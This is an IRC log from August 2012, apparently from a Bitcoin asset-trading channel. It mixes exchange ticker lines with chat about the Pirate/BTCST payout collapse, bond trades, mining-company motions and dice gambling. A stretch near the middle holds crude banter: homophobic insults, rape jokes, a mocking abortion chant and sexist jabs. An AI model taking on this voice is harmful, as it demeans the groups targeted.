[GLBSE] [CIUCIU.BOND] 15 @ 0.1 = 1.5 BTC [+] Aug 22 22:37:26 [GLBSE] [BDK.BND] 10 @ 0.101 = 1.01 BTC [-] Aug 22 22:41:32 [GLBSE] [ASICMINER] 3 @ 0.098 = 0.294 BTC [-] Aug 22 22:41:36 [GLBSE] [FOO.PPPPT] 1 @ 0.685 BTC [+] Aug 22 22:42:13 [GLBSE] [BITBOND] 1 @ 0.44 BTC [-] Aug 22 22:42:18 [GLBSE] [TYGRR.BOND-P] 1 @ 0.8 BTC [+] Aug 22 22:42:38 [15:32] -Notice- {from christel} [Global Notice] Hi all, normal services (harr, see what I did there?) should return momentarily -- unfortunately one of our major sponsors suffered loss of power and a grue had eaten the UPS! Stuff is starting to return and we shall soon be back in business. Thank you for being patient. Aug 22 22:42:43 someone needs a comedy class Aug 22 22:43:06 [GLBSE] [OBSI.HRPT] 4 @ 0.1049 = 0.4196 BTC [+] Aug 22 22:43:09 nerds can't joke. Aug 22 22:47:39 https://bitcointalk.org/index.php?topic=102563.0 Aug 22 22:51:00 mircea_popescu: I can joke Aug 22 22:51:44 [GLBSE] [GIGAMINING] 3 @ 0.942 = 2.826 BTC [-] Aug 22 22:52:07 [GLBSE] [OBSI.HRPT] 10 @ 0.1049 = 1.049 BTC [+] Aug 22 22:52:10 mircea_popescu: what's red and smells like blue paint? Aug 22 22:53:04 red paint? Aug 22 22:53:07 yup. Aug 22 22:53:30 see, my jokes are amazing. Aug 22 22:58:35 [MPEX] [S.MPOE] 35932 @ 0.00039559 = 14.2143 BTC [+] Aug 22 22:59:43 hi Aug 22 23:00:11 [GLBSE] [TYGRR.BOND-P] 1 @ 0.79999999 BTC [-] Aug 22 23:00:13 [GLBSE] [TYGRR.BOND-P] 6 @ 0.8 = 4.8 BTC [+] Aug 22 23:00:51 heh price going up Aug 22 23:01:26 [GLBSE] [FOO.PPPPT] 16 @ 0.6 = 9.6 BTC [-] Aug 22 23:01:28 [GLBSE] [FOO.PPPPT] 1 @ 0.6 BTC [-] Aug 22 23:01:46 o? Aug 22 23:01:47 ;;ticker Aug 22 23:02:11 price of tygrr-p i mean Aug 22 23:02:19 lolz Aug 22 23:02:24 was down to 0.4 already Aug 22 23:02:28 still down Aug 22 23:02:31 gribble i mean Aug 22 23:02:36 aha Aug 22 23:02:48 orly. Aug 22 23:02:58 [GLBSE] [FOO.PPPPT] 3 @ 0.685 = 2.055 BTC [+] Aug 22 23:03:03 [GLBSE] [FOO.PPPPT] 2 @ 0.685 = 1.37 BTC [+] Aug 22 23:03:32 [GLBSE] [GIGAMINING] 5 @ 0.942 = 4.71 BTC [-] Aug 22 23:05:23 [GLBSE] [FOO.PPPPT] 2 @ 0.685 = 1.37 BTC [+] Aug 22 23:10:24 [GLBSE] [BIB.PIRATE] 20 @ 0.6 = 12 BTC [+] Aug 22 23:10:36 [MPEX] [F.GIGA.ETF] 336 @ 0.00101865 = 0.3423 BTC [-] Aug 22 23:10:49 [GLBSE] [TYGRR.BOND-A] 165 @ 0.04 = 6.6 BTC [-] Aug 22 23:15:36 whats the statis of tygrr.bond-a? Aug 22 23:15:51 its not one of the PPT's Aug 22 23:16:03 Trying to keep your exchange clean, Nefario? Aug 22 23:17:00 not exactly Aug 22 23:17:06 bond-a https://bitcointalk.org/index.php?board=78.40 Aug 22 23:17:11 1mhs pps bond Aug 22 23:17:18 I've come into possesion of some of these Aug 22 23:17:21 ah Aug 22 23:17:27 cheers Aug 22 23:17:35 oops, wrong link Aug 22 23:17:36 https://bitcointalk.org/index.php?topic=81605.0 Aug 22 23:17:40 thats the thread Aug 22 23:18:40 lol, someone sold into your low bid? Aug 22 23:18:41 trade:1000@0.0001:TYGRR.BOND-A:1345634674 Aug 22 23:18:49 [GLBSE] [OBSI.HRPT] 1 @ 0.1049 BTC [+] Aug 22 23:19:09 [GLBSE] [MOVETO.FUND] 2 @ 1.18 = 2.36 BTC [+] Aug 22 23:19:11 [GLBSE] [MOVETO.FUND] 8 @ 1.18480856 = 9.4785 BTC [+] Aug 22 23:19:45 exahash: ja, I wonder is he still buying these back? Aug 22 23:19:48 Actually I picked those up. I was under the impression a card of his caught fire and he was ending the bond, guess I confused it with something else. Aug 22 23:20:00 that's tygrr.tech Aug 22 23:20:02 Guess I should quit selling it if he's still paying Aug 22 23:20:19 [GLBSE] [BIB.PIRATE] 14 @ 0.6 = 8.4 BTC [+] Aug 22 23:20:21 [GLBSE] [BIB.PIRATE] 3 @ 0.56 = 1.68 BTC [-] Aug 22 23:20:38 [GLBSE] [FOO.PPPPT] 26 @ 0.685 = 17.81 BTC [+] Aug 22 23:20:56 tech was supposed to be a mining co, whereas bond-a was a perpetual bond Aug 22 23:21:15 too much to keep rtack of Aug 22 23:21:17 ok Aug 22 23:21:21 Im off to bed Aug 22 23:21:28 sleep well Aug 22 23:21:59 nn Aug 22 23:22:03 [GLBSE] [FOO.PPPPT] 7 @ 0.7 = 4.9 BTC [+] Aug 22 23:23:36 evoorhees: i hope you don't mind my offering people brokerage services in your S.DICE thread. I know you don't want the OT merits of MPEx posts there. Aug 22 23:23:59 [GLBSE] [FOO.PPPPT] 15 @ 0.75 = 11.25 BTC [+] Aug 22 23:25:23 did i miss out on some moar drama ? Aug 22 23:25:43 nope Aug 22 23:26:32 [GLBSE] [BIB.PIRATE] 10 @ 0.6 = 6 BTC [+] Aug 22 23:26:33 [GLBSE] [BIB.PIRATE] 3 @ 0.56 = 1.68 BTC [-] Aug 22 23:27:48 [GLBSE] [OBSI.HRPT] 5 @ 0.1049 = 0.5245 BTC [+] Aug 22 23:31:07 [GLBSE] [PUREMINING] 25 @ 0.13898 = 3.4745 BTC [+] Aug 22 23:32:08 [GLBSE] [OBSI.HRPT] 9 @ 0.1049 = 0.9441 BTC [+] Aug 22 23:32:10 [GLBSE] [OBSI.HRPT] 1 @ 0.10495 BTC [+] Aug 22 23:32:28 [GLBSE] [DMC] 4 @ 0.05 = 0.2 BTC [+] Aug 22 23:32:48 [MPEX] [S.MPOE] 38600 @ 0.00039449 = 15.2273 BTC [-] Aug 22 23:32:49 [MPEX] [S.MPOE] 9801 @ 0.00039336 = 3.8553 BTC [-] Aug 22 23:35:20 [GLBSE] [TYGRR.BOND-P] 1 @ 0.79999999 BTC [-] Aug 22 23:43:31 [GLBSE] [TYGRR.BOND-P] 5 @ 0.79 = 3.95 BTC [-] Aug 22 23:44:13 [GLBSE] [TYGRR.BOND-P] 5 @ 0.8 = 4 BTC [+] Aug 22 23:45:31 omg pirate paid! Aug 22 23:46:37 aww, fell flat ;/ Aug 22 23:47:55 Pirate has not paid... Aug 22 23:48:01 [GLBSE] [TYGRR.BOND-P] 1 @ 0.8 BTC [+] Aug 22 23:48:05 he paid some small account Aug 22 23:48:16 Much rumors around that going based on a small account... Aug 22 23:48:25 Why wasn't the old accounts paid first as expected? Aug 22 23:48:43 [GLBSE] [V.HRL] 1 @ 1 BTC Aug 22 23:48:44 I don't know... but now seems people can sell their Pirate debt much higher... Aug 22 23:49:12 [GLBSE] [COGNITIVE] 1 @ 0.7 BTC [+] Aug 22 23:49:21 *In Ralph's voice* I'm a guest! Aug 22 23:49:26 [GLBSE] [V.HRL] 1 @ 1 BTC Aug 22 23:50:01 laggy gribble ;) Aug 22 23:50:14 some people, right? Aug 22 23:50:15 like imsaguy and an unknown Aug 22 23:50:29 lol Aug 22 23:50:32 ;;pet Aug 22 23:50:53 BTCMining: https://bitcointalk.org/index.php?topic=101339.msg1124039#msg1124039 ? Aug 22 23:50:53 *purrrrrrrr* Aug 22 23:50:57 o hey he's back ? Aug 22 23:50:58 ;;ticker Aug 22 23:50:58 in bitcointalk's "Important Announcemnts" forum Aug 22 23:51:21 so you opinion is that imsaguy saing that he got paid was a joke, and that bitminern8 was lying? Aug 22 23:51:27 mircea_popescu: yeah, but really laggy Aug 22 23:51:41 smickles personally, i'm holding out for jcpham Aug 22 23:52:00 smart man Aug 22 23:52:01 reading the chat log it just appeared like the guyw as torlling and as usual many played along Aug 22 23:52:05 Best bid: 9.80259, Best ask: 9.8658, Bid-ask spread: 0.06321, Last trade: 9.86581, 24 hour volume: 69032, 24 hour low: 9.5714, 24 hour high: 10.09999 Aug 22 23:52:13 [GLBSE] [FOO.PPPPT] 6 @ 0.61 = 3.66 BTC [-] Aug 22 23:52:15 [GLBSE] [FOO.PPPPT] 1 @ 0.6 BTC [-] Aug 22 23:52:17 [GLBSE] [FOO.PPPPT] 4 @ 0.6 = 2.4 BTC [-] Aug 22 23:52:23 http://bitcoin-otc.com/viewratingdetail.php?nick=BitMinerN8&sign=ANY&type=RECV Aug 22 23:52:25 I'd say like Ignatius Aug 22 23:52:27 i have no ideea who that is. Aug 22 23:52:30 i have nothing to report Aug 22 23:52:30 but i would say "nobody". Aug 22 23:52:52 [GLBSE] [BIB.PIRATE] 2 @ 0.7 = 1.4 BTC [+] Aug 22 23:52:54 [GLBSE] [BIB.PIRATE] 6 @ 0.6 = 3.6 BTC [-] Aug 22 23:52:55 [GLBSE] [BIB.PIRATE] 2 @ 0.58 = 1.16 BTC [-] Aug 22 23:52:59 [GLBSE] [FOO.PPPPT] 5 @ 0.6 = 3 BTC [-] Aug 22 23:53:16 ah well :/ Aug 22 23:53:28 -mquin- [Global Notice] Services are back now but may be a little slow while everthing settles down. Thank you for your patience, and for flying freenode! Aug 22 23:53:47 I haven't seen any proof any payment was made except bitminern8's screenshot Aug 22 23:53:52 what's this flying freenode stuff Aug 22 23:53:56 Which might well be edited. Aug 22 23:54:10 There was news about it, global notice sent around. Aug 22 23:54:11 BTC-MINING i find it very hard to trust anyone not in the wot. Aug 22 23:54:17 Some problem with the servers Aug 22 23:54:29 i just meant the expression itself. Aug 22 23:54:42 [GLBSE] [FOO.PPPPT] 1 @ 0.6 BTC [-] Aug 22 23:54:44 [GLBSE] [FOO.PPPPT] 1 @ 0.6 BTC [-] Aug 22 23:55:19 :o Aug 22 23:55:38 [GLBSE] [BIB.PIRATE] 1 @ 0.56 BTC [-] Aug 22 23:55:57 [GLBSE] [BIB.PIRATE] 13 @ 0.56 = 7.28 BTC [-] Aug 22 23:57:31 [GLBSE] [GIPPT] 25 @ 0.99999999 = 25 BTC [+] Aug 22 23:57:33 [GLBSE] [GIPPT] 25 @ 0.99999999 = 25 BTC [+] Aug 22 23:59:05 [GLBSE] [BDK.BND] 45 @ 0.101 = 4.545 BTC [-] Aug 22 23:59:12 my persoanl account is only about 4x of the screenshot of the closed account Aug 22 23:59:22 just a little fyi Aug 22 23:59:31 dunno how old i am, but i'm old Aug 22 23:59:59 maybe less Aug 23 00:00:02 maybe 3x Aug 23 00:00:12 which screenshot is that Aug 23 00:00:40 there's a screenshot floating around of the bs&t ui Aug 23 00:00:50 and a 138btc account force closed or something Aug 23 00:00:59 from today with tx id Aug 23 00:01:13 i also do not know this person Aug 23 00:02:06 aha Aug 23 00:02:30 so if that person was paid Aug 23 00:02:40 then i'm.....where Aug 23 00:03:14 i have more in a ever older larger account Aug 23 00:03:19 *even Aug 23 00:03:28 I don't believe anyone has been paid, but I do wonder if that is the reason for the slight increase in bond value I see today. Aug 23 00:03:39 buy my persoanl account is both old-ish and small-ish Aug 23 00:03:46 compared to most of the sums I'm seeing Aug 23 00:04:14 all the debt is being bought Aug 23 00:04:24 I am banned by pirateat40 in #btcst but he owes me Aug 23 00:04:43 I believe so... misinformation so people can sell their PPT higher... Aug 23 00:04:44 19:53.53 ( @pirateat40 ) Just cleaning out the smaller accounts to make things easier. Aug 23 00:04:44 wow banhammers over thar,,, :( Aug 23 00:04:50 jcpham ^^ Aug 23 00:04:55 and BTC_MINING got it too Aug 23 00:05:02 err Aug 23 00:05:05 BTC-MINING: Aug 23 00:05:08 thats who I mean. for asking a pretty good q:( Aug 23 00:05:17 don't get me wrong Aug 23 00:05:24 Pirate bans critics... he also claimed to cleaning out small account too, although he said older accounts would be paid first Aug 23 00:05:26 I believe so... misinformation so people can sell their PPT higher... << sounds likely. Aug 23 00:05:26 i'm cool as a cucumber Aug 23 00:05:32 all my info was correct though Aug 23 00:05:43 I want to see the large PPT accounts being paid Aug 23 00:05:46 i read that pirate confirmed the payment, so if it was fake, pirate is likely in on it too Aug 23 00:06:06 blockchain matches screenshot from what i saw Aug 23 00:06:08 did someone quote pirate as confirming it smickles? Aug 23 00:06:11 all i said was that he paid the smaller accounts by using btc of the big accounts. And then wham banned Aug 23 00:06:24 Pirate already had the habit to agree with all the wild scenario claims about his operation's business... Aug 23 00:06:35 hes a prick Aug 23 00:06:44 I don't see why he wouldn't do the same about payments or anything else... Aug 23 00:07:08 Seeing how he's handling the closure, I'm now sure he's either already gone or planning to be gone soon. Aug 23 00:07:17 And just buying time using confusion. Aug 23 00:07:22 Ignatius-otc: i need to find where i read that at Aug 23 00:07:27 trendon shavers is a fishdick Aug 23 00:07:30 well guys its been interesting. detrimental to btc, but entertaining Aug 23 00:07:42 no problem smickles just curious,the forums are a mess with so muchs cattered intel Aug 23 00:08:18 Ignatius-otc i am really sad that people let themselves be taken in like this Aug 23 00:08:31 [GLBSE] [GIGAMINING] 1 @ 0.9889 BTC [+] Aug 23 00:08:33 My account had a reverse... Aug 23 00:08:41 but hey, all lessons must b learned anew in every new environment. Aug 23 00:08:51 Its such a shame, why is this happening Aug 23 00:09:12 [GLBSE] [BITBOND] 1 @ 0.46 BTC [+] Aug 23 00:09:23 [MPEX] [S.MPOE] 10199 @ 0.00039336 = 4.0119 BTC [-] Aug 23 00:09:24 [MPEX] [S.MPOE] 28801 @ 0.00039287 = 11.315 BTC [-] Aug 23 00:09:52 [GLBSE] [FOO.PPPPT] 1 @ 0.6 BTC [-] Aug 23 00:09:54 [GLBSE] [FOO.PPPPT] 1 @ 0.6 BTC [-] Aug 23 00:09:55 [GLBSE] [FOO.PPPPT] 1 @ 0.5 BTC [-] Aug 23 00:12:05 heh, as to the whole pirate thing, i have no idea if he's actually paying back or not, Aug 23 00:12:28 it appears he as to a few small accounts Aug 23 00:12:36 i don't really stand to lose anything directly if he doesn't Aug 23 00:12:39 he can say all he wants, but I have not recieved a dime Aug 23 00:12:40 nothing of substance Aug 23 00:12:45 JWU_42: we were just talking about that Aug 23 00:13:05 I am hoping for something before mid September ;) Aug 23 00:13:13 lol Aug 23 00:13:18 hoping before christmas Aug 23 00:13:27 yet another turn of 'endless september' Aug 23 00:13:33 o, 23:12.50 ( @pirateat40 ) ultramancool, investments in bitcoin will never really take off due to it not being regulated. Aug 23 00:13:38 PsychoticBoy: you are at the end of the line now buddy ;) Aug 23 00:13:48 I know :( Aug 23 00:13:54 just like bitlane Aug 23 00:14:04 you are ahead of him i am sue Aug 23 00:14:06 sure Aug 23 00:14:13 lol 2nd last Aug 23 00:14:50 lol Aug 23 00:15:03 hope, I better play sunday million on poker stars then, chaces I win are higher than pirate will pay out Aug 23 00:15:14 and what pisses me off is that it's mostly the forum idiots that promoted this Aug 23 00:15:15 *chances Aug 23 00:15:24 i want to see the lot of them with fucking shoes on their head Aug 23 00:15:26 isnt poker stars a ponzi too? Aug 23 00:15:30 <@pirateat40> Swashy, not thus far, if things don't progress in the next 12-14 hours I'll let everyone know. Aug 23 00:15:31 "o, the forum bankers". citizen finance ffs. Aug 23 00:18:33 [MPEX] [S.MPOE] 8971 @ 0.00039287 = 3.5244 BTC [-] Aug 23 00:18:35 [MPEX] [S.MPOE] 10800 @ 0.00039266 = 4.2407 BTC [-] Aug 23 00:18:36 [MPEX] [S.MPOE] 27829 @ 0.00039191 = 10.9065 BTC [-] Aug 23 00:22:13 Bitcoin assets and securities discussion. << you could take out that part with no loss i think Aug 23 00:22:30 hm Aug 23 00:22:58 yeah someone wated to put it like that Aug 23 00:23:08 [MPEX] [S.MPOE] 4047 @ 0.00039383 = 1.5938 BTC [+] Aug 23 00:23:12 kakobrekla: at what point does icbit.se make the cut of 'topic worthy exchanges'? Aug 23 00:23:34 is that asset exchange? Aug 23 00:23:35 [GLBSE] [MERGEDMINING] 3 @ 0.09399 = 0.282 BTC [+] Aug 23 00:23:45 it has one ass from deepbit Aug 23 00:23:50 *asset Aug 23 00:23:50 [GLBSE] [MMM] 10 @ 0.8 = 8 BTC [+] Aug 23 00:23:52 hm Aug 23 00:23:58 with futures too Aug 23 00:24:29 two more votes to put it up there and i will? Aug 23 00:24:40 anyone' Aug 23 00:24:44 sounds fair Aug 23 00:25:18 [GLBSE] [FOO.PPPPT] 1 @ 0.75 BTC [+] Aug 23 00:25:18 smickles Aug 23 00:25:18 damn it Aug 23 00:25:21 why didn't you mjessage me Aug 23 00:25:31 i was getting around to it Aug 23 00:25:34 i waited for the vm transfer to continue Aug 23 00:25:35 there mircea_popescu, fixed Aug 23 00:25:38 :D Aug 23 00:25:39 and i was watching a stupid movie Aug 23 00:25:42 and i stopped working Aug 23 00:25:47 .. i blame this on you Aug 23 00:25:51 lmao Aug 23 00:26:02 hey i got nick highlighted Aug 23 00:26:07 i was minding my business Aug 23 00:26:08 lol, i just noticed 'a biased message' Aug 23 00:26:20 cause every woman has the right Aug 23 00:26:23 i was serious tho, who do you think doesn't figure it's assets discussion from the listing of exchanges ? Aug 23 00:26:24 to kill her baby Aug 23 00:26:26 day or night Aug 23 00:26:32 ha Aug 23 00:26:33 and they're tryin to take awa Aug 23 00:26:35 yea yeah ok Aug 23 00:26:37 our abortionsssss Aug 23 00:26:38 [GLBSE] [FZB.A] 1 @ 0.0369 BTC [+] Aug 23 00:27:01 so ICBIT Aug 23 00:27:05 yes or no Aug 23 00:27:10 what is it Aug 23 00:27:11 abortions, apple pie, and USA Aug 23 00:27:22 23:23.12 ( smickles ) kakobrekla: at what point does icbit.se make the cut of 'topic worthy exchanges'? Aug 23 00:27:32 please girls, focus. Aug 23 00:27:36 is it a btc absed exchange? then yeah... Aug 23 00:27:44 how old is it Aug 23 00:27:49 dunno Aug 23 00:27:50 months Aug 23 00:27:51 and who runs it Aug 23 00:27:52 its old. Aug 23 00:27:54 and who runs it Aug 23 00:27:55 and who runs it Aug 23 00:27:56 nobody uses it afaik Aug 23 00:27:56 I can't find any assets there Aug 23 00:27:59 i think the criteria should be "can they be made to stream" Aug 23 00:27:59 rg: 'merica is so fucking fucked Aug 23 00:28:02 fire soomehtin Aug 23 00:28:13 hehe mp Aug 23 00:28:18 rg: you fucking throwbacks are reversing evolution Aug 23 00:28:19 maybe we could reach out to the owner Aug 23 00:28:28 or get an indepenadt security review Aug 23 00:28:29 bitfoo: go to the 'exchange' tab in the web trading app Aug 23 00:28:37 prior to sending any funds or registering any accounts Aug 23 00:28:41 there is also a futures tab Aug 23 00:28:43 ok turkey knife Aug 23 00:28:54 i updated the billing so you can use the remote consolen ow Aug 23 00:28:58 how the fuck can half your countries political system believe in talking snakes and rib women Aug 23 00:29:09 smickles: what exchange tab? :D Aug 23 00:29:16 do I need to create an account before I can see that? Aug 23 00:29:37 bitfoo: https://icbit.se/WebTrade/ Aug 23 00:29:54 and you do need an account Aug 23 00:29:57 oh Aug 23 00:29:58 ok Aug 23 00:30:43 well thb cryptostocks was added before we started implementing twitter feed Aug 23 00:30:51 so im gonna add this IC link Aug 23 00:30:56 "address" : "1C9CxmaXfgYdTfmLBc2MjevVvyQswqCAgk", Aug 23 00:30:56 "category" : "receive", Aug 23 00:30:56 "amount" : 9.78450000, Aug 23 00:30:57 its not like im putting sand in your vaginas. Aug 23 00:30:58 "address" : "1G2CykBY2xCwdbBnH5f9EapmhPrtdQ9Su", Aug 23 00:30:58 "category" : "receive", Aug 23 00:30:58 "amount" : 9.78450000, Aug 23 00:31:08 abortions, apple pie, and satoshi dice Aug 23 00:31:25 rg if the ipo fails ima come after you. Aug 23 00:31:40 not my fault im better at satoshidice than most Aug 23 00:31:57 im really going to write a bot in shellscript tonight when i wake up Aug 23 00:31:59 and use my method Aug 23 00:32:05 im going to give it like a 3 btc allowance Aug 23 00:32:07 and let it run Aug 23 00:32:15 you will loose. Aug 23 00:32:17 what you playing, small high ? Aug 23 00:32:23 kakobrekla: im up like 50 btc Aug 23 00:32:28 for 2 days Aug 23 00:32:29 so.. Aug 23 00:32:34 wooo woo! so much ram :D Aug 23 00:32:39 rg is teh new pirate! Aug 23 00:32:41 smickles :;) Aug 23 00:32:44 hey Aug 23 00:32:48 in my parts Aug 23 00:32:51 thems fighting words Aug 23 00:32:55 trendon is such a gay name Aug 23 00:33:01 you should make one of those "make money at home" websites Aug 23 00:33:03 it is. Aug 23 00:33:09 rape ghost is much less gayish Aug 23 00:33:24 there's nothing gay about rape ghost Aug 23 00:33:26 at all Aug 23 00:33:35 its not even rape ghost Aug 23 00:33:38 its electronic rap ghost Aug 23 00:33:44 erapghost Aug 23 00:33:49 its just funnier as rapeghost Aug 23 00:34:06 you listen to hippy hoppy? Aug 23 00:34:17 no **** ENDING LOGGING AT Thu Aug 23 00:34:18 2012 **** BEGIN LOGGING AT Thu Aug 23 00:34:20 2012 Aug 23 00:34:21 but i am a rapper Aug 23 00:34:22 [MPEX] [S.MPOE] 24953 @ 0.00039383 = 9.8272 BTC [+] Aug 23 00:34:24 [MPEX] [S.MPOE] 10905 @ 0.00039559 = 4.3139 BTC [+] Aug 23 00:34:25 [MPEX] [S.MPOE] 3400 @ 0.00039611 = 1.3468 BTC [+] Aug 23 00:34:26 [MPEX] [S.MPOE] 8442 @ 0.00039615 = 3.3443 BTC [+] Aug 23 00:34:31 o? Aug 23 00:35:08 when shit hits the fan there i stand with my glock and my blunt in my hand what's the plan Aug 23 00:35:25 :D Aug 23 00:35:48 LOL Aug 23 00:35:49 man Aug 23 00:35:51 you gotta see this Aug 23 00:36:00 im watching a movie named 'The Recruit' Aug 23 00:36:07 in the beginning it shows a web browser Aug 23 00:36:11 looking at some stuff Aug 23 00:36:15 the URL is still visible Aug 23 00:36:25 the last part of the url is: Aug 23 00:36:38 /images/source-images/fakesite/htmled_site/page_02.html Aug 23 00:36:55 that's just lazy Aug 23 00:37:00 Indeed. Aug 23 00:37:10 but they don't expect everyone to be a nerdy neckbeard Aug 23 00:37:12 lol Aug 23 00:37:15 ya Aug 23 00:37:27 i have a quick eye Aug 23 00:37:27 only a few geeks will notice Aug 23 00:37:29 i dont know what to tlel you Aug 23 00:37:59 it just has to be good enough, like with most things Aug 23 00:38:58 pentest it. Aug 23 00:39:35 not only that Aug 23 00:39:37 its file:// Aug 23 00:40:24 http://pics.kuvaton.com/kuvei/totally_not_julian.jpg Aug 23 00:40:41 so anyone actually know who this factory dood is on the forum ? Aug 23 00:41:37 who, what Aug 23 00:42:17 ;;ticker Aug 23 00:42:17 Best bid: 9.80002, Best ask: 9.83, Bid-ask spread: 0.02998, Last trade: 9.80001, 24 hour volume: 66314, 24 hour low: 9.5714, 24 hour high: 10.09999 Aug 23 00:42:38 [GLBSE] [FOO.PPPPT] 20 @ 0.75 = 15 BTC [+] Aug 23 00:43:13 [GLBSE] [FOO.PPPPT] 2 @ 0.75 = 1.5 BTC [+] Aug 23 00:46:22 myea. Aug 23 00:49:55 [GLBSE] [TYGRR.BOND-B] 2 @ 0.1 = 0.2 BTC [-] Aug 23 00:58:12 well Aug 23 00:58:15 it took all god damn day Aug 23 00:58:23 but i pulled another 18 btc out of satoshidice Aug 23 00:59:14 21.35 even Aug 23 01:00:51 do you guys think the new bitcoin credit cards will count towards credit Aug 23 01:01:22 like a discovery card Aug 23 01:05:20 don't login as root. Aug 23 01:10:17 prepaid card don't usually count toward credits now, does it? Aug 23 01:10:21 Eh Aug 23 01:17:39 [MPEX] [S.MPOE] 4286 @ 0.00039191 = 1.6797 BTC [-] Aug 23 01:21:50 [GLBSE] [OBSI.HRPT] 2 @ 0.10495 = 0.2099 BTC [+] Aug 23 01:22:19 [MPEX] [S.MPOE] 19914 @ 0.00039114 = 7.7892 BTC [-] Aug 23 01:23:37 [MPEX] [S.MPOE] 35700 @ 0.00039282 = 14.0237 BTC [+] Aug 23 01:43:43 [GLBSE] [OBSI.HRPT] 15 @ 0.104959 = 1.5744 BTC [+] Aug 23 01:45:11 [GLBSE] [OBSI.HRPT] 22 @ 0.104955 = 2.309 BTC [-] Aug 23 01:47:19 [GLBSE] [OBSI.HRPT] 3 @ 0.104955 = 0.3149 BTC [-] Aug 23 01:48:39 [GLBSE] [OBSI.HRPT] 3 @ 0.10496 = 0.3149 BTC [+] Aug 23 01:54:26 [MPEX] [S.MPOE] 3000 @ 0.00039164 = 1.1749 BTC [-] Aug 23 02:03:50 hey deadte..... he isnt here Aug 23 02:03:51 goddamnit Aug 23 02:10:26 Diablo-D3: OBSI.ABMO will upgrade it's 3rd single in 2 weeks. >11Mhash a share on order at that point Aug 23 02:11:27 yay Aug 23 02:11:34 lol http://en.wikipedia.org/wiki/Bitcoin Aug 23 02:12:17 EmanuelDeOrtego: I am not clicking Aug 23 02:12:22 is it more bitcoin-qt bullshit? Aug 23 02:12:49 Just take a look at the top of the article Aug 23 02:12:53 It will tell you everything Aug 23 02:14:37 [GLBSE] [FUTUREFUND] 25 @ 0.0001177 = 0.0029 BTC [-] Aug 23 02:17:13 [GLBSE] [BFLS.RIG] 20 @ 0.8999 = 17.998 BTC [+] Aug 23 02:17:57 [MPEX] [F.GIGA.ETF] 7000 @ 0.00101003 = 7.0702 BTC [-] Aug 23 02:19:46 [MPEX] [F.GIGA.ETF] 164 @ 0.00101101 = 0.1658 BTC [+] Aug 23 02:19:48 [MPEX] [F.GIGA.ETF] 15368 @ 0.00101158 = 15.546 BTC [+] Aug 23 02:19:49 [MPEX] [F.GIGA.ETF] 3182 @ 0.00103132 = 3.2817 BTC [+] Aug 23 02:20:12 [GLBSE] [BFLS.RIG] 11 @ 0.8999 = 9.8989 BTC [+] Aug 23 02:24:34 [GLBSE] [BITCOINMINV] 10 @ 0.12 = 1.2 BTC [-] Aug 23 02:28:20 Obsi: okay so Aug 23 02:28:32 Obsi: what does 1mhs have total in hardware/ Aug 23 02:29:24 [GLBSE] [GIGAMINING] 1 @ 0.9889 BTC [+] Aug 23 02:29:26 [GLBSE] [GIGAMINING] 5 @ 0.9889 = 4.9445 BTC [+] Aug 23 02:30:02 the talk page there reminds me why wikipedia is such offensive crap. Aug 23 02:30:28 Hah, what do you mean? Aug 23 02:30:34 Obsi: because Im thinking, after we upgrade all of our units Aug 23 02:30:39 [GLBSE] [GIGAMINING] 1 @ 0.989 BTC [+] Aug 23 02:30:40 [GLBSE] [GIGAMINING] 3 @ 0.989 = 2.967 BTC [+] Aug 23 02:30:55 Obsi: you post a motion to upgrade all of 1mhs's units in exchange for all the new 1mh bonds that will be produced Aug 23 02:31:12 EmanuelDeOrtego i mean, a collection of clearly unqualified people opining from imaginary heights on various points of minutia. Aug 23 02:31:58 Obsi: or actually, dont even produce the bonds, just buy the units and upgrades right out, all the existing 1mhs bonds can be ran off a single SC single Aug 23 02:32:33 Obsi: actually even btter Aug 23 02:33:00 Obsi: a motion on 1mhs to close 1mhs and buy back all the bonds at whatever the buyback clause is, the cost of this being paid by ABMO Aug 23 02:33:25 Obsi: and do this after ABMO is finished upgrading (ie, when 1mh bonds are like 0.000001 in value) Aug 23 02:35:33 Obsi: it makes more sense to just collapse 1mhs into abmo Aug 23 02:38:49 I will probably buy back the 1MHS bonds at 0.1 when the ASICs arrive... right now ABMO has 3 singles with 1 left to upgrade... I will sell ASICs into ABMO at BFL prices in BTC or payout divs, whichever shareholders vote for Aug 23 02:40:19 Doing the math on expected network hashrate with people claiming they can produce ASICs at <$1 Ghash doesn't make expansion seem very profitable until the prices drop considerably Aug 23 02:40:51 [GLBSE] [TYGRR.BOND-P] 20 @ 0.75 = 15 BTC [-] Aug 23 02:42:40 I have a few thou shares of ASICMINER I might be willing to sell into ABMO at cost as well, once the last single upgrade is bought. Aug 23 02:43:48 [MPEX] [S.MPOE] 1186 @ 0.00039164 = 0.4645 BTC [-] Aug 23 02:43:50 [MPEX] [S.MPOE] 39014 @ 0.00039095 = 15.2525 BTC [-] Aug 23 02:46:03 Diablo-D3: ^ Aug 23 02:49:50 Obsi: if you do a motion to sell asicminer into abmo (preferably for abmo shares), I'd vote yes on it Aug 23 03:00:11 [GLBSE] [FOO.PPPPT] 50 @ 0.74799998 = 37.4 BTC [-] Aug 23 03:01:34 [GLBSE] [BIB.PIRATE] 15 @ 0.77 = 11.55 BTC [+] Aug 23 03:05:21 Diablo-D3: Do you want that motion now, or after the 3rd single upgrade is paid for? I don't know that I would trade in my ASICMINER shares as I already hold quite a bit of OBSI.ABMO and I'm not even sure how to value them... 1:1? Aug 23 03:11:37 [MPEX] [S.BVPS] 468 @ 0.00355158 = 1.6621 BTC [-] Aug 23 03:12:10 [GLBSE] [YABMC] 25 @ 0.1309 = 3.2725 BTC [+] Aug 23 03:12:12 [GLBSE] [YABMC] 20 @ 0.131 = 2.62 BTC [+] Aug 23 03:12:13 [GLBSE] [YABMC] 5 @ 0.131 = 0.655 BTC [+] Aug 23 03:12:45 Obsi: a motion to buy your asicminer shares is concurrent to a 3rd single upgrade Aug 23 03:12:50 Obsi: as for valuing them, hrrrrm Aug 23 03:12:53 1:1 isnt fair Aug 23 03:13:24 Obsi: and thees nothing wrong with you owning a lot of abmo Aug 23 03:13:29 its your company, you do the hard work Aug 23 03:14:03 Obsi: I'd approve of a motion for 2 abmo for 1 asicminer Aug 23 03:15:19 Obsi: 22mh of abmo + asicminer boosting it another x mh for 30mh asicminer Aug 23 03:15:24 Obsi: seems to be about fair Aug 23 03:16:04 I guess we can do that, I'll post the motion shortly Aug 23 03:17:07 Obsi: but to answer your other question fully, 3rd single upgrade must happen before 1mhs gets merged into abmo **** BEGIN LOGGING AT Thu Aug 23 10:36:30 2012 Aug 23 10:37:53 [MPEX] [F.GIGA.ETF] 12800 @ 0.0010114 = 12.9459 BTC [+] Aug 23 